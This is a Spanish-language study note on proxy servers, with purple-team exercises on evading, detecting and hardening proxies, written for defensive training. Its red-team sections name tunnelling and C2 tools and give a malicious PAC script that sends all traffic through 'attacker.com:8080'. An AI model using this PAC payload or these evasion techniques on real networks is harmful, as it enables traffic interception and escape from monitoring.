Servidores Proxy

1. Definición y propósito

Un servidor proxy actúa como intermediario entre clientes y servidores, aplicando reglas de filtrado, inspección y control del tráfico en diferentes capas (L3–L7).

💡 Analógica: Imagina una recepcionista de seguridad que intercepta cada carta enviada y la revisa antes de reenviarla o devolverla, asegurándose de que no haya veneno o documentos prohibidos en su interior.

2. Tipos principales de proxy

✅ Proxy de reenvío (Forward Proxy)

• Gestiona tráfico saliente (cliente → internet).

• Normalmente ubicado en la red interna o el borde de la red.

• Puede cachear contenido, filtrar por ACLs, controlar el acceso a Internet, anonimizar.

• Usa puertos como 8080, 3128 o 8888.

Ejemplo: Un proxy Squid en una empresa filtra acceso a sitios web y guarda copias en caché.

✅ Proxy inverso (Reverse Proxy)

• Gestiona tráfico entrante (internet → servidor).

• Se coloca en el DMZ o zona desmilitarizada.

• Protege los servidores backend ocultando sus IPs, balanceando carga, aplicando TLS, y haciendo inspección profunda.

Ejemplo: Un NGINX reverse proxy en la nube que protege una app web, fuerza HTTPS y redirige al backend según reglas.

3. Modos de implementación

Tipo ¿Requiere configuración cliente? Capa Características
Proxy no transparente ✅ Sí (configura IP/puerto manualmente) L7 Preciso, control total.
Proxy transparente ❌ No (se intercepta el tráfico) L2–L3 Invisible, útil en redes grandes.

4. Ventajas y casos de uso

Funcionalidad > ¿Dónde aplica? Ventaja clave
Filtrado de contenido > Proxy directo > Bloqueo por categorías, URL, etc.
Caché de contenido web > Proxy directo > Menos consumo de ancho de banda
Inspección TLS > Proxy directo o inverso > Inspección SSL/TLS con CA propia
Balanceo de carga > Proxy inverso > Alta disponibilidad backend
Protección WAF (Web App Firewall) > Proxy inverso > Defensa contra inyecciones, XSS
Anonimato y ocultación de IPs > Ambos > Reduce exposición de infraestructura

5. Protocolo PAC y WPAD

• PAC (Proxy Auto Config): Script .pac que el navegador usa para decidir si debe o no usar proxy para una solicitud.

• WPAD (Web Proxy Auto Discovery): Método para encontrar automáticamente archivos PAC sin intervención del usuario.

🧠 Ejercicio Purple Team — Proxy 360º

🎯 Tema: "Evasión, detección y endurecimiento de proxies (L7)"

🔓 Red Team: Técnicas de evasión de proxy

1. Uso de túneles cifrados (VPNs y SSH Tunnels)

   • Objetivo: Saltarse el filtrado web (proxy forward).

   • Herramienta: ssh -D 1080, OpenVPN.

   • Impacto: El tráfico escapa sin inspección de contenido.

2. Encapsulamiento en DNS (DNS tunneling)

   • Herramienta: iodine, dnscat2.

   • Impacto: Salta proxy al usar tráfico DNS aparentemente legítimo.

3. Uso de CDN maliciosos (evadir reverse proxies)

   • Se usa Cloudflare o Akamai para esconder el tráfico a proxies inversos.

   • Impacto: Dificulta atribución y detección de ataques reales al backend.

🛡 Blue Team: Detección y respuesta

1. Detección de túneles cifrados no autorizados

   • JA3 Fingerprinting, análisis de patrones de sesión.

   • Herramientas: Zeek, Wireshark, TLSH.

2. Bloqueo de proxies desconocidos y PAC externos

   • Regla en el firewall para denegar .pac remotos o auto-configuración externa.

   • SIEM detecta usuarios usando WPAD fuera del rango corporativo.

3. Reverse proxy + WAF

   • Configurar reglas para detectar:

     • URLs con SQLi, XSS, path traversal.

     • Firmas de herramientas comunes (sqlmap, dirbuster).

   • Herramientas: ModSecurity, NAXSI, Suricata.

🔁 Purple Team: Análisis y mejora de arquitectura

1. Simular bypass del proxy con ssh -D

   • Resultado: El Blue Team detecta o no, según el nivel de visibilidad.

   • Mejora: Forzar DPI incluso sobre puertos "permitidos" (443).

2. Revisión de reglas en el WAF frente a payloads evasivos

   • Simulación: SQLi avanzada que se oculta en parámetros GET/POST.

   • Mejora: Añadir whitelist/blacklist de comportamientos y no solo firmas.

3. Auditoría de PAC y WPAD

   • Prueba: Cambiar el PAC por uno falso que reenvía tráfico por IP maliciosa.

   • Mejora: Firmar scripts PAC con certificados internos y auditar cambios en WSUS.

📌 Cierre conceptual

• El proxy no solo filtra, también transforma, almacena y protege.

• Un atacante lo ve como un obstáculo... o una oportunidad para ocultarse.

• Como arquitecta, es vital que el proxy no sea un punto ciego, sino un sensor de seguridad inteligente, integrado con el WAF, el SIEM y las políticas de acceso.

• El Purple Team permite cerrar el bucle: lo que se evade, se detecta; lo que se detecta, se endurece.

🧠 Ejercicio Purple Team — "La batalla del Proxy: evasión, detección y fortificación"

En este escenario práctico trabajaremos sobre el uso, abuso y defensa de servidores proxy de reenvío y proxy inverso, una parte crítica del perímetro de seguridad.

🔴 Red Team — Explotar y evadir proxies

🎯 Objetivo: Utilizar y evadir proxies para ocultar actividad maliciosa y acceder a recursos internos.

🛠️ Ataque 1 – Encapsulación HTTPS en proxy transparente mal configurado

• Qué hacemos: Enviamos tráfico HTTPS cifrado con payloads maliciosos (túneles C2, carga útil ofuscada) a través de un proxy transparente sin inspección TLS.

• Herramienta: msfvenom + chisel, https-tunnel

• Técnica: Enviar comandos C2 cifrados en HTTPS sobre 443 a través del proxy.

• Resultado: El proxy permite la conexión al no inspeccionar el tráfico cifrado.

🛠️ Ataque 2 – Bypass de autenticación en proxy de reenvío

• Qué hacemos: Usamos scripts PAC manipulados para engañar al navegador o cliente y redirigir el tráfico a un destino no autorizado.

• Herramienta: Crear archivo .pac y alojarlo en servidor malicioso.

• Payload:

  javascriptCopiarEditarfunction FindProxyForURL(url, host) { return "PROXY attacker.com:8080"; }

• Resultado: El cliente se configura automáticamente para usar el proxy malicioso.

🛠️ Ataque 3 – Enumeración de red a través de un proxy inverso expuesto

• Qué hacemos: Aprovechamos errores de configuración del proxy inverso (ej. Nginx o HAProxy) para descubrir servidores internos mediante análisis de respuestas y headers.

• Herramienta: curl, httpx, ffuf

• Resultado: Descubrimos hosts internos tras el proxy (SSRF o malas rutas reversas).

🔵 Blue Team — Detectar y proteger el perímetro de proxy

🎯 Objetivo: Detectar y mitigar abuso de proxies, reforzando su seguridad.

🛡 Defensa 1 – Inspección TLS en proxy transparente

• Solución: Implementar TLS/SSL interception (con certificado raíz interno), inspeccionar URLs y contenidos HTTPS.

• Herramientas: Squid, OPNsense + ClamAV, pfSense + Snort

• Acción:

  • Interceptar puerto 443.

  • Validar certificados y analizar tráfico antes de permitir salida.

🛡 Defensa 2 – Control de PAC y WPAD

• Solución: Bloquear y controlar acceso a archivos .pac y desactivar WPAD donde no sea necesario.

• Auditoría: Revisar solicitudes automáticas a wpad.domain.com o rutas sospechosas de configuración proxy.

🛡 Defensa 3 – Hardening del proxy inverso

• Solución:

  • Restringir rutas internas y bloquear métodos como TRACE, OPTIONS.

  • Eliminar headers que filtran información interna (X-Forwarded-*).

  • Aplicar reglas WAF (ModSecurity) sobre el proxy inverso.

🟣 Purple Team — Validación cruzada, corrección y mejora continua

🧠 Análisis conjunto:

• El Red Team logró:

  • Saltarse proxy transparente sin TLS inspection.

  • Redirigir tráfico con PAC falso.

  • Enumerar infraestructura interna tras proxy inverso.

• El Blue Team defendió:

  • Añadiendo inspección TLS y validación de certificados.

  • Controlando archivos PAC/WPAD.

  • Fortificando la configuración del proxy inverso.

🧩 Mejoras del Purple Team:

• Activar alertas SIEM ante patrones anómalos de tráfico proxy (muchas conexiones 443 externas, nuevos destinos).

• Monitorear eventos de modificación o acceso a archivos .pac.

• Simular internamente red team tests trimestrales sobre proxies.

• Mantener una lista blanca de dominios permitidos a través del proxy.

✍🏼 Reflexión técnica

Los proxies son puertas controladas de entrada y salida, pero también puntos estratégicos para eludir controles si no están bien configurados. Como arquitecta de seguridad, diseño entornos donde el tráfico saliente es inspeccionado a nivel de aplicación, los PAC/WPAD están controlados y los proxies inversos están blindados para que ningún atacante pueda ver más allá del borde.